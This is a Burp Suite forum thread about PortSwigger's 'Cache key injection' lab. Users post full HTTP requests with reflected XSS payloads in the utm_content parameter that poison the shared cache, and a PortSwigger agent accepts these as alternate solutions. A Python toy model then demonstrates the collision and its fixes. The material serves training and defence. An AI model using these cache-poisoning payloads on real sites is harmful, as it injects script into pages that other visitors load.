Burp Suite User Forum


Lab: Cache key injection

Anton | Last updated: Jul 14, 2022 01:48PM UTC

Hi, it seems that this lab can be solved without key injection, simply by caching this at the redirect:

    GET /login?lang=en?utm_content='/><script>alert(1)</script><' HTTP/1.1
    Host: 0a2e00a50385b22cc025239e00f8009b.web-security-academy.net
    Cookie: session=YukqrX6kheQFOEdzhS1sQPm7uqJjc0oN; lang=en
    Pragma: x-get-cache-key
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: https://0a2e00a50385b22cc025239e00f8009b.web-security-academy.net/
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: cross-site
    Sec-Fetch-User: ?1
    Cache-Control: max-age=0
    Te: trailers
    Connection: close

This is probably not intended, but it is possible to escape one of the links in this way.

Michelle, PortSwigger Agent | Last updated: Jul 14, 2022 03:03PM UTC

There can be a few different ways to solve a lab, as we verify whether the lab conditions have been met rather than verifying that the method used matches the lab solution. Congratulations on finding an alternate solution to the lab :)

majortom | Last updated: May 23, 2023 09:58AM UTC

I found a similar unintended solution: you just poison the cache key for the main page - the one where you see blog posts listed (cache key for it is: /$$) with the utm_content=test'/><script>alert(1)</script> parameter that is reflected in the main page <link> tag. As the two requests have the same cache key (/$$) we can poison the caching mechanism:

    GET /?utm_content=test'/><script>alert(1)</script> HTTP/2
    Host: 0a920039034e23e982eaa1f2000900c3.web-security-academy.net
    Cookie: session=6IJGsV611zAzd9ZFE5lkWbBTT5ubaYfB; lang=en
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: none
    Sec-Fetch-User: ?1
    Dnt: 1
    Sec-Gpc: 1
    Te: trailers
    Pragma: x-get-cache-key
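Both posts above rely on the same root cause: a query parameter (utm_content) that the cache leaves out of its key but the origin reflects unescaped into the page, so an attacker's response is stored under the same key a clean request maps to. The toy model below is an added example written for this thread, not code from PortSwigger or the lab; the cache key format, the `UNKEYED_PARAMS` set and the `<link>` template are assumptions chosen to mirror the behaviour described, not the lab's real implementation. It shows the collision, then the two defender-side fixes: HTML-encoding the reflected value at the origin, and keying the cache on the full query string so unkeyed-but-reflected inputs cannot exist.

```python
from html import escape
from urllib.parse import urlsplit, parse_qsl, urlencode

# Assumption (constructed for this example): the cache strips analytics
# parameters from its key the way the thread describes for utm_content.
UNKEYED_PARAMS = {"utm_content"}


def cache_key(url: str, key_on_full_query: bool) -> str:
    """Derive a cache key for a request URL (constructed key format, not the lab's).

    With key_on_full_query=False, utm_content is dropped from the key, so
    '/' and '/?utm_content=<anything>' map to the same cache entry.
    """
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    if not key_on_full_query:
        params = [(k, v) for k, v in params if k not in UNKEYED_PARAMS]
    return parts.path + "?" + urlencode(sorted(params))


def render_home(url: str, escape_output: bool) -> str:
    """Origin response for the home page; utm_content is reflected in a <link> tag."""
    query = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    utm = query.get("utm_content", "")
    if escape_output:
        # Fix 1: encode ' " < > & before reflecting, so the attribute cannot be closed.
        utm = escape(utm, quote=True)
    return f"<link rel='canonical' href='/?utm_content={utm}'/>\n<h1>Blog</h1>"


class Cache:
    """Minimal shared cache sitting in front of render_home."""

    def __init__(self, key_on_full_query: bool, escape_output: bool) -> None:
        self.store: dict[str, str] = {}
        self.key_on_full_query = key_on_full_query  # Fix 2 when True
        self.escape_output = escape_output
        self.hits = 0

    def get(self, url: str) -> str:
        key = cache_key(url, self.key_on_full_query)
        if key in self.store:
            self.hits += 1
            return self.store[key]
        body = render_home(url, self.escape_output)
        self.store[key] = body
        return body


# The payload quoted in the thread, used here only to show the collision.
PAYLOAD_URL = "/?utm_content=test'/><script>alert(1)</script>"


def victim_view(key_on_full_query: bool, escape_output: bool) -> tuple[str, bool]:
    """Attacker request first, then a victim fetching plain '/'.

    Returns (html the victim receives, whether it came from the cache).
    """
    cache = Cache(key_on_full_query, escape_output)
    cache.get(PAYLOAD_URL)
    html = cache.get("/")
    return html, cache.hits == 1


if __name__ == "__main__":
    for cfg in ((False, False), (False, True), (True, False)):
        html, cached = victim_view(*cfg)
        print(f"full_query_key={cfg[0]} escape={cfg[1]} cached={cached}")
        print(html.splitlines()[0])
```

Only the first configuration serves the injected script to the victim; output encoding alone fixes the injection, and keying on the full query alone removes the collision. In practice both belong in place, since the origin should never trust that every reflected input is keyed by every cache in front of it.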

Michelle, PortSwigger Agent | Last updated: May 24, 2023 07:38AM UTC

Thanks for getting in touch. We'll pass those details on to the team.
